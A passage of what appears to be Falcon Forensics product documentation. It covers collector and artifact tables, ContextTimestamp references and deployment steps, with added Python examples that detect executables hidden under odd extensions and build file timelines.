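# Extensions under which a PE image is expected (assumed list, not from the page).
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv", ".efi"}
HEADER_READ = 4096  # assumption: e_lfanew beyond this is not followed


@dataclass
class SignatureMismatch:
    path: str
    extension: str
    sha256: Optional[str]  # None when the file exceeds HASH_LIMIT_BYTES


def is_pe_image(data: bytes) -> bool:
    """True when data starts with an MZ DOS header whose e_lfanew (offset 0x3C)
    points at the 'PE\\0\\0' signature; a text file that merely begins with 'MZ' fails."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return len(data) >= e_lfanew + 4 and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def sha256_or_none(path: str) -> Optional[str]:
    """SHA256 of the file, or None when it is above the hash size limit."""
    if os.path.getsize(path) > HASH_LIMIT_BYTES:
        return None
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_tree(root: str) -> List[SignatureMismatch]:
    """Return PE images whose extension is not one a PE would normally carry."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(HEADER_READ)
            except OSError:
                continue
            if not is_pe_image(head):
                continue  # portable executables only, as the limitation says
            ext = os.path.splitext(name)[1].lower()
            if ext in PE_EXTENSIONS:
                continue
            findings.append(SignatureMismatch(path, ext, sha256_or_none(path)))
    return sorted(findings, key=lambda f: f.path)


def build_minimal_pe() -> bytes:
    """Constructed MZ/PE header: not loadable, just enough for the signature check."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)  # e_lfanew -> offset 0x40
    header[0x40:0x44] = b"PE\x00\x00"
    return bytes(header)


def demo():
    """Create three constructed files and report which ones the scan flags."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "report.doiuv"), "wb") as fh:
            fh.write(build_minimal_pe())        # PE bytes under a fake extension
        with open(os.path.join(root, "tool.exe"), "wb") as fh:
            fh.write(build_minimal_pe())        # PE bytes under an expected extension
        with open(os.path.join(root, "notes.txt"), "wb") as fh:
            fh.write(b"MZ is just text here")   # starts with MZ but is not a PE
        return [(f.extension, f.sha256 is not None) for f in scan_tree(root)]


if __name__ == "__main__":
    print(demo())
```

The check follows e_lfanew rather than trusting the MZ prefix alone, which is what keeps plain text that happens to begin with "MZ" out of the results; the hash is still recorded for flagged files under the size limit so the finding can be pivoted to Dirlist events.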

Mac and Linux

For information about collected data and fields, see Events Full Reference (Events Data Dictionary).

| Collector | Mac | Linux | Data collected | Event generated | Limitations |
| --- | --- | --- | --- | --- | --- |
| Apple Spotlight Logs | Yes | No | Collects the Apple Spotlight Logs. | LogEntry - A log entry observed on an endpoint. | None |
| Apple System Logs (ASL) | Yes | No | Collects the Apple System Log (ASL) events. | LogEntry - A log entry observed on an endpoint. | 5,000 entries |
| Apple Unified Logs (AUL) | Yes | No | Collects the Apple Unified Log (AUL) events. | LogEntry - A log entry observed on an endpoint. | 10,000 entries; 5,000 entries for tccd |
| Audit | Yes | Yes | Collects audit log information. | LogEntry - A log entry observed on an endpoint. | 20,000 entries |
| Authorized Keys | Yes | Yes | Gathers information about authorized SSH keys. | FileEntry - Some portion of a text file, either a single line or a matched regular expression. | None |
| Autoruns | Yes | No | Collects information about programs that are run automatically. | AutoRunProcessInfo - Informational event on a process that was executed automatically. | None |
| Basic collection log information | Yes | Yes | | LogEntry - A log entry observed on an endpoint. | None |
| Browser | Yes | Yes | Collects information from Chrome, Firefox, and Safari browser events. | BrowserAccountInfo - Information about a browser's user accounts. BrowserCookieInfo - Browser tracking cookie information. BrowserDownloadStart - Browser downloaded file information signifying download start time. BrowserDownloadEnd - Browser downloaded file information signifying download end time. BrowserExtensionInfo - Browser extension and addon information. BrowserHistoryVisit - Information about a browser history entry. BrowserHistoryClearInfo - Browser history clearing event information. BrowserProxyInfo - Information about a proxy in the browser. | 1,000 record limit |
| Cron jobs | No | Yes | Collects information about cron jobs. | FileEntry - Some portion of a text file, either a single line or a matched regular expression. | None |
| Directory and file metadata, including hashes and permissions | Yes | Yes | | FileInfo - Information about a file. FileTimestampMetadata - File time event per timestamp for a given file, used to build a timeline of creation, access, and modification of a file. SignInfo - Information about the signing state of an image. | Mac: 100,000 limit for all except user-local; 200,000 limit for user-local. Linux: 200,000 limit |
| Environment variables | Yes | Yes | Collects information about all system and current user variables. | RuntimeEnvironmentVariable - Environment variable provided to a process. In the context of Falcon Forensics, this is an environment variable provided to the collector process itself. | None |
| Event Taps | Yes | No | Collects information about Mac HID events. | EventTapInfo - Describes a macOS event tap. Event taps enable capturing of keyboard and mouse HID events. | None |
| Forensics Collector Events | Yes | Yes | Gathers events related to the running of Falcon Forensics. | ForensicsCollectorOnline - Marks the beginning of a Forensics collection. ForensicsCollectorOffline - Final event of a Forensics collection. ForensicsCollectorLog - A log entry emitted by the Falcon Forensics Collector process. | None |
| Group enumeration | Yes | Yes | Gathers information about group accounts. | GroupAccount - Information about an observed group account. | None |
| Host machine OS version | Yes | Yes | Gathers information about the system the collector is run on. | OsVersionInfo - Provides details about the OS that the agent is running on. | None |
| Installed Applications | Yes | Yes | Collects information for installed applications. | InstalledApplication - This event contains all the information for a single app. | None |
| Ip4/6 Firewall Rules | No | Yes | Collects IP4/IP6 firewall events from iptables. | FirewallRuleIP4 - Information on a base IP4 firewall rule from iptables. FirewallRuleIP6 - Information on a base IP6 firewall rule from iptables. | None |
| IPv4 network routing information | Yes | Yes | Collects network information for several different parts of the system. | NetworkListenIP4 - IPv4 network listen event. NetworkReceiveAcceptIP4 - IPv4 network SYN event. NetworkConnectIP4 - IPv4 network connect event. NetworkCloseIP4 - IPv4 network close event. RouteIP4 - IPv4 route entry. | None |
| IPv6 network routing information | Yes | Yes | Collects network information for several different parts of the system. | NetworkListenIP6 - IPv6 network listen event. NetworkReceiveAcceptIP6 - IPv6 network SYN event. NetworkConnectIP6 - IPv6 network connect event. NetworkCloseIP6 - IPv6 network close event. RouteIP6 - IPv6 route entry. | None |
| Kernel Logs | No | Yes | Collects information from the kernel log. | LogEntry - A log entry observed on an endpoint. | 5,000 entries |
| Kernel Modules | Yes | Yes | Collects information about a module that has been loaded into memory. | KernelModeLoadImage - Indicates a kernel-mode module has been loaded into memory. | None |
| Kernel Parameter | No | Yes | Collects kernel parameters. | KernelParameter - A value in the operating system kernel. | None |
| Known Hosts | Yes | Yes | Collects information from the known hosts file. | FileEntry - Some portion of a text file, either a single line or a matched regular expression. | None |
| Line | Yes | Yes | Collects files matching specific patterns line by line, for example: Kernel | FileEntry - Some portion of a text file, either a single line or a matched regular expression. | None |
| Local IPv4 | Yes | Yes | | LocalIpAddressIP4 - Describes an IPv4 address on the machine. | None |
| Local IPv6 | Yes | Yes | | LocalIpAddressIP6 - Describes an IPv6 address on the machine. | None |
| Local log data | Yes | Yes | | LogEntry - A log entry observed on an endpoint. | None |
| Mac Fs Events | Yes | No | Gathers information about Mac FSEvents records. | MacFsEventRecord - Mac FSEvents record, forensically interesting filesystem logging/information. | None |
| MacKnowledge | Yes | No | Collects information from the KnowledgeC database. | MacKnowledgeActivityStart - An entry from a KnowledgeC database indicating the start of some user activity on a macOS system. MacKnowledgeActivityEnd - An entry from a KnowledgeC database indicating the end of some user activity on a macOS system. | None |
| MacMRU | Yes | No | Grabs information from sfl/sfl2 files for most recently used items. | MacMRU - A digital forensics record derived from Apple SharedFileList (.sfl/.sfl2) files. This event helps identify most recently used resources such as applications, documents, and volumes. | None |
| MacSpotlight | Yes | No | Collects information from Mac Spotlight. | SpotlightSearchEntry - Per-user Spotlight search information. | None |
| Network usage | Yes | No | Collects network usage on the endpoint and processes. Note: The network usage collector does not collect data for Big Sur or later versions unless SIP is disabled on the system. | NetworkEndPointDataUsage - This event has total counts of sent and received octets and packets to and from the network-attached endpoint during an active connection. The counting window is the life of the endpoint. ProcessDataUsage - Measurements and statistics of data traffic sent and received to and from the target process. | None |
| Process state information | Yes | Yes | Collects information about process state at the time of collection. | ProcessRollup2 - Running process observed at collection time. | None |
| Safari configuration/history/cookies | Yes | No | Note: The Falcon Forensics Collector executable requires Full Disk Access to collect Safari browser artifacts such as history, cookies, and configurations. | BrowserCookieInfo - Browser tracking cookie information. BrowserDownloadStart - Browser downloaded file information signifying download start time. BrowserDownloadEnd - Browser downloaded file information signifying download end time. BrowserExtensionInfo - Browser extension/addon information. BrowserHistoryVisit - Information about a browser history entry. | 1,000 entries |
| Shell Configs | Yes | Yes | Gathers information about shell configurations. | FileEntry - Some portion of a text file, either a single line or a matched regular expression. | None |
| Shell history | Yes | Yes | Gathers shell history information. | FileEntry - Some portion of a text file, either a single line or a matched regular expression. | None |
| SSH configs | Yes | Yes | Gathers SSH config information. | FileEntry - Some portion of a text file, either a single line or a matched regular expression. | None |
| System configs | Yes | Yes | Collects information from system configurations. | FileEntry - Some portion of a text file, either a single line or a matched regular expression. | None |
| System configuration | Yes | Yes | Collects information about the system it is run on. | OsVersionInfo - Provides details about the OS that the agent is running on. | None |
| System extensions | Yes | No | Collects information about loaded system extensions. | SystemExtension - Describes a macOS system extension identified by the collector. | None |
| Systemlog | Yes | Yes | Gathers information from multiple system log files. | LogEntry - A log entry observed on an endpoint. | Maximum age: 100 days. Mac: 50,000 events. Linux: 10,000 events per logfile |
| System Start Configs | No | Yes | Collects information about system start, such as init. | FileEntry - Some portion of a text file, either a single line or a matched regular expression. | None |
| Terminal saved state | Yes | No | Grabs a Terminal's saved state. | TerminalSavedStateInfo - macOS Terminal saved state information. | None |
| UserAccount | Yes | Yes | Collects information about user and group accounts on the machine. | UserAccount - Information about an observed user account. GroupAccount - Information about an observed group account. | None |
| User activity - quarantine | Yes | No | Collects Mac quarantine events from the quarantine database. | LSQuarantineEvent - A database record indicating that the system quarantined a file. QuarantineXattribute - A file xattribute value indicating that the system quarantined a file. | None |
| UTMP Log | Yes | Yes | Collects information from various UTMP sources. | LogEntry - A log entry observed on an endpoint. | 10,000 events per log. Maximum age: 100 days |
| Volume | Yes | Yes | Lists all disks. | FsVolumeMounted - Information about a volume that has been observed. | None |
| ZSH Session | Yes | No | Collects information from uuid.session and uuid.history files located in .zsh_sessions. | FileEntry - Some portion of a text file, either a single line or a matched regular expression. | None |

Artifacts supported by Falcon Forensics for the UAC collector

| Artifact | Description | Events Emitted |
| --- | --- | --- |
| bodyfile | Displays file stat information. | FileInfo and FileTimestampMetadata |
| containers/containerd | Displays containerd information. | FileEntry |
| containers/docker | Displays docker information. | FileEntry |
| hardware/dmesg | Collects the system and kernel message buffer. | LogEntry |
| hardware/prtconf | Displays system configuration information. | FileEntry |
| hash_executables | Hashes executable files. | FileHashesEvent |
| logs/additional_logs | Displays log files and directories. | LogEntry |
| logs/apache | Displays Apache files. | LogEntry |
| logs/nginx | Displays Nginx files. | LogEntry |
| logs/tomcat | Displays Tomcat files. | LogEntry |
| logs/var_adm | Collects system logs. | LogEntry |
| logs/var_log | Collects system logs. | LogEntry |
| logs/var_run_log | Collects ESXi system logs. | LogEntry |
| network/arp | Gathers the ARP table for neighbor listing. | NeighborListIP4 |
| network/esxcli | Lists ESXi network information. | NetworkCloseIP4/6, NetworkConnectIP4/6, NetworkListenIP4/6, RouteIP4/6, NeighborListIP4/6 |
| network/hostname | Displays the system hostname. | FileEntry |
| network/ifconfig | Displays network interface information. | LocalIpAddressIP4/6 |
| network/inetadm | Displays information about inetd services. | FileEntry |
| network/ipfstat | Displays packet filter statistics and filter lists. | FileEntry |
| network/iptables | Displays numerical-address firewall rule chains. | FileEntry |
| network/netstat | Displays network information. | NetworkListenIP4, NetworkConnectIP4, NetworkCloseIP4, NetworkReceiveAcceptIP4 |
| network/vim-cmd | Displays network information from local files for ESXi. | FileEntry |
| packages/dnf | Displays installed packages. | FileEntry, InstalledApplication |
| packages/dpkg | Displays dpkg status file information. | InstalledApplication |
| packages/dpkg | Displays installed packages. | InstalledApplication |
| packages/esxcli | Displays VIB packages, host acceptance level, and installed packages. | InstalledApplication |
| packages/flatpak | Displays installed Flatpak packages. | InstalledApplication |
| packages/pip | Displays Python packages installed with pip. | InstalledApplication |
| packages/rpm | Displays installed packages and other context. | InstalledApplication, FileEntry |
| packages/yum | Displays installed packages. | InstalledApplication |
| process/hash_running_processes | Hashes running processes. | FileHashesEvent |
| process/lsof | Lists open files. | FileEntry |
| process/ps | Shows currently running processes. | ProcessState |
| process/pstree | Displays a tree of processes. | FileEntry |
| process/ptree | Displays a tree of processes. | FileEntry |
| shell/config | Grabs shell config information. | FileEntry |
| shell/history | Grabs shell history information. | FileEntry |
| ssh/authorized_keys | Displays authorized_keys information. | FileEntry |
| ssh/known_hosts | Displays known_hosts information. | FileEntry |
| ssh/rc | Displays rc files from ~/.ssh/rc. | FileEntry |
| storage/blkid | Displays UUIDs for mounted storage. | FileEntry |
| storage/df | Displays file system disk space usage. | DiskUtilization |
| storage/esxcli | Lists volumes available on the host. | FsVolumeMounted |
| storage/mount | Displays mounted filesystems. | FsVolumeMounted |
| storage/zfs | Displays zfs filesystems. | FileEntry |
| storage/zpool | Displays information for all available pools. | FileEntry |
| system/date | Displays the current system date and time. | FileEntry |
| system/dev_shm | Displays system temp file information. | LogEntry |
| system/esxcli | Displays system, user, and config information. | FileEntry |
| system/etc | Displays system configuration files. | FileEntry, UserAccount, GroupAccount |
| system/job_scheduler | Displays cron and at file information. | FileEntry |
| system/last | Displays login and logout information. | LogEntry |
| system/lastb | Displays the list of unsuccessful logins. | LogEntry |
| system/lsmod | Displays the status of modules in the kernel. | KernelModeLoadImage |
| system/modinfo | Displays information about loaded kernel modules. | KernelModeLoadImage |
| system/systemd | Displays systemd config file information. | FileEntry |
| system/uname | Displays system information. | FileEntry |
| system/uptime | Displays how long the system has been running. | FileEntry |
| system/xsession_errors | Displays the xsession errors file. | LogEntry |
| vms/esxcli | Displays virtual machines and virtual machine networking information. | FileEntry |
| vms/vim-cmd | Displays virtual machines. | FileEntry |
| vms/vm-support | Lists registered virtual machines. | FileEntry |

ContextTimestamps field descriptions

Find forensics timestamps in Windows, Mac, and Linux.

ContextTimestamps show different times, such as the time a file was created or an event occurred. For example, if you need to know the creation time of a file, look at the ContextTimestamp of the FileTimestampMetadata event that has a FfcFileChangeType of CHANGE_CREATED.
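The paragraph above says that a file's creation time is the ContextTimestamp of the FileTimestampMetadata event whose FfcFileChangeType is CHANGE_CREATED. The following is an added example (not CrowdStrike's code) that applies that rule over a constructed set of exported events to build a per-file timeline and to flag files whose modification time precedes their creation time, which is common for files copied onto a host. The field names event_simpleName and FilePath, the change-type values other than CHANGE_CREATED, and the epoch-second sample timestamps are assumptions made for the example.

```python
"""Build a per-file timeline from FileTimestampMetadata events using ContextTimestamp.
Added illustration, not Falcon Forensics code. Field names other than ContextTimestamp,
FfcFileChangeType and CHANGE_CREATED are assumptions."""
from collections import defaultdict
from datetime import datetime, timezone
from typing import Dict, List, Optional, Tuple

# Constructed sample events shaped like exported Forensics events (not real data).
SAMPLE_EVENTS = [
    {"event_simpleName": "FileTimestampMetadata", "FilePath": r"C:\Users\alice\tool.exe",
     "FfcFileChangeType": "CHANGE_CREATED", "ContextTimestamp": 1700003600},
    {"event_simpleName": "FileTimestampMetadata", "FilePath": r"C:\Users\alice\tool.exe",
     "FfcFileChangeType": "CHANGE_MODIFIED", "ContextTimestamp": 1700000000},
    {"event_simpleName": "FileTimestampMetadata", "FilePath": r"C:\Users\alice\tool.exe",
     "FfcFileChangeType": "CHANGE_ACCESSED", "ContextTimestamp": 1700007200},
    # A FileInfo event's ContextTimestamp is the observation time, not a file time.
    {"event_simpleName": "FileInfo", "FilePath": r"C:\Users\alice\tool.exe",
     "ContextTimestamp": 1700010000},
    {"event_simpleName": "FileTimestampMetadata", "FilePath": r"C:\Windows\notepad.exe",
     "FfcFileChangeType": "CHANGE_CREATED", "ContextTimestamp": 1600000000},
    {"event_simpleName": "FileTimestampMetadata", "FilePath": r"C:\Windows\notepad.exe",
     "FfcFileChangeType": "CHANGE_MODIFIED", "ContextTimestamp": 1650000000},
]


def file_timestamps(events: List[dict]) -> Dict[str, Dict[str, int]]:
    """Map path -> {FfcFileChangeType: ContextTimestamp}, using only FileTimestampMetadata."""
    out: Dict[str, Dict[str, int]] = defaultdict(dict)
    for ev in events:
        if ev.get("event_simpleName") != "FileTimestampMetadata":
            continue  # other events carry observation time, which is not a file timestamp
        out[ev["FilePath"]][ev["FfcFileChangeType"]] = ev["ContextTimestamp"]
    return dict(out)


def creation_time(events: List[dict], path: str) -> Optional[int]:
    """The rule from the text: CHANGE_CREATED's ContextTimestamp is the creation time."""
    return file_timestamps(events).get(path, {}).get("CHANGE_CREATED")


def timeline(events: List[dict]) -> List[Tuple[int, str, str]]:
    """All (timestamp, path, change type) rows in chronological order."""
    rows = [(ts, path, change)
            for path, changes in file_timestamps(events).items()
            for change, ts in changes.items()]
    return sorted(rows)


def modified_before_created(events: List[dict]) -> List[str]:
    """Paths whose modification time is earlier than their creation time. A file copied
    onto the host gets the copy time as creation time while keeping the source's
    modification time, so these deserve a second look during triage."""
    flagged = []
    for path, ch in file_timestamps(events).items():
        if "CHANGE_CREATED" in ch and "CHANGE_MODIFIED" in ch \
                and ch["CHANGE_MODIFIED"] < ch["CHANGE_CREATED"]:
            flagged.append(path)
    return sorted(flagged)


def iso(ts: int) -> str:
    return datetime.fromtimestamp(ts, timezone.utc).isoformat()


if __name__ == "__main__":
    for ts, path, change in timeline(SAMPLE_EVENTS):
        print(iso(ts), change, path)
    print("modified before created:", modified_before_created(SAMPLE_EVENTS))
```

Only FileTimestampMetadata events feed the timeline; the FileInfo event for the same path is skipped because, per the Windows table below, its ContextTimestamp is the observation time rather than a property of the file.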

Windows

ContextTimestamp field descriptions for Windows.

| Event name | ContextTimestamp field description |
| --- | --- |
| AmCacheEntry | Observation time |
| ArchiveInfo | Observation time |
| ArchiveMemberInfo | Observation time |
| AtJobInfo | Observation time |
| AutoRunProcessInfo | Observation time |
| BamRegAppRunTime | Observation time |
| BITSJobFileInfo | Observation time |
| BITSJobInfo | Observation time |
| BITSJobMetadata | Metadata creation time, time modified, time expired |
| BrowserCookieInfo | Creation time |
| BrowserDownloadStart/End | Start time and end time |
| BrowserExtensionInfo | Observation time |
| BrowserHistoryVisit | Last accessed time |
| DnsCache | Observation time |
| DnsServer | Observation time |
| DriverLoad | Observation time |
| FfcBytePatternScanResult | Observation time |
| FileDeleted | Deleted time |
| FileEntry | Observation time |
| FileInfo | Observation time |
| FileSignatureMismatch | Observation time |
| FileSignatureStatistics | Observation time |
| FilesStatisticInfo | Observation time |
| FileTimestampMetadata | FfcFileChangeType time |
| FirewallRuleInfo | Observation time |
| ForensicsCollectorLog | Event time |
| ForensicsCollectorOffline | Collector end time |
| ForensicsCollectorOnline | Collector start time |
| FsVolumeMounted | Observation time |
| JumpListInfo | Observation time |
| LinkFileInfo | Observation time |
| LocalGroupIdentity | Observation time |
| LocalIpAddressIP4/6 | Observation time |
| LogEntry | Time the system generated the entry |
| MalPaths | Observation time |
| MftBootSector | Observation time |
| MftRecord | Observation time |
| MpThreat | Observation time |
| MpThreatAction | Based on MpThreatActionType: detection, remediation, or LastStatusChange |
| MpThreatWMI | Observation time |
| MpThreatDetection | Observation time |
| MpThreatDetectionWMI | Observation time |
| NamedPipe | Observation time |
| NeighborListIP4/6 | Observation time |
| NetShareInfo | Observation time |
| NetworkCloseIP4/6 | Time the connection was initially opened. If unable to retrieve, then displays observation time. |
| NetworkConnectIP4/6 | Time the connection was initially opened. If unable to retrieve, then displays observation time. |
| NetworkDnsSuffix | Observation time |
| NetworkHostsFileEntry | Observation time |
| NetworkListenIP4/6 | Time the connection was initially opened. If unable to retrieve, then displays observation time. |
| NetworkReceiveAcceptIP4/6 | Time the connection was initially opened. If unable to retrieve, then displays observation time. |
| NetworkStatisticsIP4/6 | Observation time |
| NetworkStatisticsTCP4/6 | Observation time |
| NetworkStatisticsUDP4/6 | Observation time |
| OsUpdateTimestamp | Observation time |
| OsVersionInfo | Operating system install time |
| PcaAppLaunchEntry | Timestamp of entry |
| PcaGeneralDbEntry | Timestamp of entry |
| PeCodePageInfo | Observation time |
| PeHeaderInfo | Observation time |
| PeHeaderOptionalInfo | Observation time |
| PeLanguageId | Observation time |
| PeSectionInfo | Observation time |
| PrefetchFile | Observation time |
| ProcessHandleTableEntry | Observation time |
| ProcessRollup2 | Observation time |
| RecentExecutionTimestamp | Timestamp based on TimestampSourceType |
| RegFeatureUsageInfo | Last write time |
| RegGenericInfo | Registry write time |
| RegShimCache | Observation time |
| RouteIP4/6 | Observation time |
| RuntimeEnvironmentVariable | Observation time |
| ScheduledTaskInfo | Observation time |
| HostedServiceStatusInfo | Observation time |
| ShellBagFileTimestampMetadata | FfcFileChangeType time |
| ShellBagInfo | Observation time |
| ShimDbTag | Observation time |
| SignInfo | Observation time |
| SruApplicationResourceUsage | Timestamp from SRUM database |
| SruApplicationTimelineProvider | Timestamp from SRUM database |
| SruNetworkConnectivityUsage | Observation time |
| SruNetworkDataUsage | Timestamp from SRUM database |
| SuperfetchAppInfo | Observation time |
| SuperfetchAppSchedule | Observation time |
| SyscacheEntry | Observation time |
| UsbDeviceInfo | Last write time |
| UserAccessLogEntry | Observation time |
| UserAssistAppLaunchInfo | Observation time |
| UserIdentity | Observation time |
| USNRecord | Timestamp of record |
| WebShellDetected | Observation time |
| WlanInterfaceInfo | Observation time |
| WmiQuery | Observation time |

Mac and Linux

ContextTimestamp field descriptions for Mac and Linux.

Event Name ContextTimestamp field description
ForensicsCollectorOnline Event generation time
ForensicsCollectorOffline Event generation time
ForensicsCollectorLog Event generation time
AutorunProcessInfo Observation time
BrowserAccountInfo Observation time
BrowserCookieInfo Cookie creation time
BrowserDownloadStarted Download start time
BrowserDownloadEnd Download end time
BrowserExtensionInfo Observation time
BrowserHistoryInfo Time site was last visited
BrowserHistoryClear Observation time
BrowserProxy Observation time
EntropyScan Time analyzed
EventTapInfo Observation time
FileDescriptorMonitor Last time the file was modified. If empty, then displays observation time.
FileEntry Last modified time of file
FileTimestampMetadata Timestamp of change
FileInfo Observation time
FirewallRuleInfo Observation time
FsVolumeMounted Observation time
GroupAccount Observation time
InstalledApplication Install time
KernelModeLoadImage Observation time
KernelParameter Observation time
LocalIpAddressIP4/6 Observation time
LogEntry Varies. In raw text logs, observation time. Collections like UTMP/AUL will grab the timestamp from UTMP/AUL.
LSQuarantineEvent Timestamp from the database. If no time, then observation time.
MacMRU Last modified time of file
MacFsEventRecord Observation time
MacKnowledgeStart/End Time activity started or ended
NetworkCloseIP4/6 Time connection was initially opened. If unable to retrieve, then observation time.
NetworkConnectIP4/6 Time connection was initially opened. If unable to retrieve, then observation time.
NetworkEndPointDataUsage Observation time
NetworkListenIP4/6 Time connection was initially opened. If unable to retrieve, then observation time.
NetworkRecieveAcceptIP4/6 Time connection was initially opened. If unable to retrieve, then observation time.
OsVersionInfo Observation time
ProcessDataUsage Collection time
ProcessOpenedFileDescriptor Observation time
ProcessRollup2 Observation time
QuarantineXattribute Timestamp from quarantine database
RouteIP4/6 Observation time
RuntimeEnvironmentVariable Collection start time
SignInfo Observation time
SystemExtension Observation time
UserIdentity Change time of the user’s home directory
UserAccountDeleted Time user was deleted
SpotlightSearchEntry Last modified time of file
TerminalSavedStateInfo Last modified timestamp of the data.data file.

Plan to deploy Falcon Forensics

You need these items to deploy Falcon Forensics:

  • A network environment where host machines can connect to specific CrowdStrike-owned domains.

  • A deployment tool in your environment or a central workstation computer where you can run PowerShell commands. PowerShell is available for all platforms.

  • The latest Falcon Forensics executable.

  • A CrowdStrike API client key from the Falcon console.

  • To enable managed deployment of Falcon Forensics, the Falcon Real Time Response (RTR) policy must have two commands enabled: put and run.

Using Falcon Real Time Response (RTR) with PowerShell Falcon (PSFalcon) is a supported deployment mechanism for Falcon Forensics, and it is used throughout the steps in this document. However, you can deploy the executable using normal enterprise software management tools and procedures. If you plan to use a tool other than RTR with PSFalcon, make sure you do some initial test runs to ensure it runs correctly before deploying it in more places.

Note: On each host, you must run the executable with administrator or system privileges.

You must pass a customer ID (CID) with checksum to the Falcon Forensics executable. There are two ways to do this:

  • If the sensor is not installed: You must provide a valid CID.

  • If the sensor is installed: You must provide the CID of the installed sensor. If you give a different CID, you will see an error stating that the CID passed does not match the installed sensor.

You must manually pass your CID to the collector at each endpoint or host using a command-line parameter. For data collection to start, you must provide the CID and a root-privileged account.

For example, after opening a terminal session, run a command similar to the following, replacing the CID with checksum with your own CID with checksum found on the Sensor Downloads page.

sudo ./ffc -cid 0123456789ABCDEFGHIJKLMNOPQRSTUV-WX
Tip: You can add the -verbose flag to send any informational logging to STDOUT. Error messages are sent to STDERR with or without this flag.

If the CID check does not pass, the collection does not start and the collector exits with code 116. For more information, see Exit codes.

Use managed deployment to deploy Falcon Forensics

Managed deployment facilitates the rapid and seamless deployment of the latest Falcon Forensics collector version to sensor-managed endpoints. Managed deployment uses Real Time Response's put and run actions. After deployment, the collector connects to the cloud and performs any pending collections.

Note: The Falcon sensor must be deployed on the endpoint to use managed deployment.

To turn on managed deployment, perform these steps:

  1. Go to Endpoint security > Forensics > Forensics Collections.

  2. Click Create collection.

  3. If you have not opted in to customizable collections, a notification appears. Type OPT-IN into the text box, then click Opt-in.

  4. You must select at least one Collection target. Enable Deploy FFC to facilitate the deployment of the Falcon Forensics collector. This will also allow you to define optional proxy declarations.

  5. In the Real Time Response policy for the hosts, you must enable the put and run commands. For more info, see Configuring response policies.

For more info about creating collections, see Create a collection.

Ensure host machines can reach CrowdStrike
  • Identify if Falcon Forensics requires an explicit proxy configuration to access the domain provided by CrowdStrike. For more info, see Falcon Forensics.

  • Allow CrowdStrike’s upload server through the firewall.

  • Disable SSL inspection of traffic to the provided domain.

  • Allowlist any necessary static IP addresses.

  • Trust DigiCert High Assurance certificates: https://www.digicert.com/kb/digicert-root-certificates.htm.

  • Add the Falcon Forensics executable, 32-bit and 64-bit versions, to the allowlist of any antivirus software or application. CrowdStrike can provide the hashes for allowlisting.

  • If you use proxies, you must provide them prior to executing Falcon Forensics or have the traffic to the URL or IP addresses excluded from the proxy.

Proxy support

Falcon Forensics Collector natively supports the use of a proxy through an environment variable set before execution. To define a proxy, set it with HTTP_PROXY= or HTTPS_PROXY=.

Examples

Mac and Linux

HTTPS_PROXY=http://127.0.0.1:10000 /path/to/ffc -cid <CID with Checksum>

Windows

Using PowerShell, or RTR Runscript:

$env:HTTPS_PROXY="http://127.0.0.1:10000"; Start-Process Path\to\FalconForensics.exe -ArgumentList "-cid <CID with Checksum>"

Note: This does not change the global environment variable, only the current PowerShell session.

Command line arguments

In Falcon Forensics 1.9.x and later, you can use command line arguments to define a proxy for the collector. Add these options to your execution to configure a proxy:

  • -proxy-host: URL/IP of the proxy server

  • -proxy-port: Port number of the proxy server

  • -no-proxy: Instructs the collector to not look for a proxy (top priority)

Examples

Mac and Linux

/path/to/ffc -cid <CID with Checksum> -proxy-host http://127.0.0.1 -proxy-port 10000

Windows

C:\path\to\ffc -cid <CID with Checksum> -proxy-host http://127.0.0.1 -proxy-port 10000

Create Fusion SOAR workflows

The Forensics collection workflow action allows you to create an action attached to a trigger that creates a collection on a host or group of hosts. This workflow action can rapidly deploy Falcon Forensics. For example, you might want to quickly deploy Forensics to endpoints that have had a critical level detection.

These are the configurable fields:

  • Configuration ID: Universally Unique Identifier (UUID) of the configuration you want to run.
  • AID: Agent IDs of the machine you want to target.
  • Collection Tag: Collection tag to group the collections originating from this action.
  • Priority: The priority level for a collection created with a workflow action. Ranges from 1 (lowest) to 10 (highest).
  • Platform: Platform targeted by this action: Windows, Mac, Linux.
  • Deadline: The time after which the collection should not run, in MM/DD/YY HH:MM format. If the targeted machine went offline and did not come back online before the deadline, the collection will not run.
  • Self Destruct: If this is set to true, Falcon Forensics deletes the executable file after it finishes the collection and shuts down.
  • Proxy Host: Allows you to set a proxy. For example, http://127.0.0.1.
  • Proxy Port: Allows you to set a proxy port for the Proxy Host. For example, 10000.
  • No Proxy: Takes precedence over the proxy settings and forces Forensics to run with a direct connection to the cloud. Use this field if you do not want to use a proxy.

Gather a list of host machines to run Falcon Forensics

  1. Open PowerShell and check the version.

    $PSVersionTable.PSVersion.ToString()

    If you don’t have at least version 5.1, download a more recent version from GitHub.

  2. In CrowdStrike Falcon, go to the Tool Downloads page under the Support app.


  3. Download the Falcon Forensics executable, and store it at a known path on your computer.

  4. Create or edit an OAuth2 API client in Falcon.

    1. In the Falcon console, go to Support > API Clients and Keys.

      1. Click Add new API client to create one. Alternatively, you can edit an existing API client by clicking the Edit icon.

      2. Ensure that Client Name and Description are set.

    2. Adjust the permissions of the API client.

      1. Go to Hosts permissions and select Read.

      2. Go to the Real time response permission and select both Read and Write.

      3. Go to the Real time response (admin) permission and select Write.

    3. Click Save, and then save or record the Client ID and Secret key that shows. You can view it only once.
      Important: These credentials are very sensitive and provide the ability to run Real Time Response (RTR) commands with elevated privileges. If you choose to store these credentials electronically, save them in a password manager or encrypted file.
    4. Click Done.

  5. The module included on the PowerShell Gallery is signed and requires an ExecutionPolicy of RemoteSigned or lower. If your ExecutionPolicy is set to Restricted, you can’t install the module from the PowerShell Gallery. You can check your current ExecutionPolicy with Get-ExecutionPolicy and change it to RemoteSigned using Set-ExecutionPolicy.

    1. Use the Install-Module command to download and install the module under your user account.

      Install-Module -Name PSFalcon -Scope CurrentUser

  6. Create a list of hosts to run Falcon Forensics in a spreadsheet (.csv). It is recommended that you export this list from Host Management in the Falcon console.

